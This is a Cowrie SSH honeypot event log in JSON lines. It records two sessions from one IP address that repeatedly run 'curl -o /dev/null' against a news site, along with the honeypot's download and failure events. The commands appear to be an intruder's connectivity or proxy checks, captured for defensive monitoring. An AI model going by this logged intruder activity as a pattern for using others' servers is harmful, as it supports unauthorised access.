{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.311635Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.314186Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.323265Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.329274Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:47.344613Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.345875Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.348603Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:47.352367Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.353577Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.355559Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.376970Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:47.392289Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.393509Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.395262Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.397486Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:47.409532Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.410722Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:47.458988Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.460342Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.469769Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:47.474454Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.475736Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.490988Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.508915Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.510582Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:47.515522Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.516786Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:47.521370Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.522595Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.541832Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:47.559298Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.560845Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:47.563290Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.564708Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.581897Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.598621Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:47.602379Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.603763Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:47.606463Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.607784Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.624299Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.628375Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:47.643332Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.644802Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.647454Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:47.649671Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.650860Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.673508Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:47.681648Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.682984Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:47.688162Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.689372Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:47.719831Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.721067Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:47.728675Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.729940Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.738417Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.750348Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:47.759135Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.760421Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.764797Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:47.769580Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.770705Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.784359Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.791476Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.793487Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:47.819979Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.821459Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:47.831176Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.832669Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.837896Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.859851Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:47.863824Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.865184Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:47.874118Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.875486Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:47.905049Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.906420Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:47.915806Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.917176Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.920134Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.924344Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.942101Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:47.967391Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.968505Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.973713Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:47.975009Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.976052Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:48.021555Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.022924Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.026120Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:48.028786Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.030318Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.031695Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.034033Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.041843Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:48.059031Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.060368Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:48.070816Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
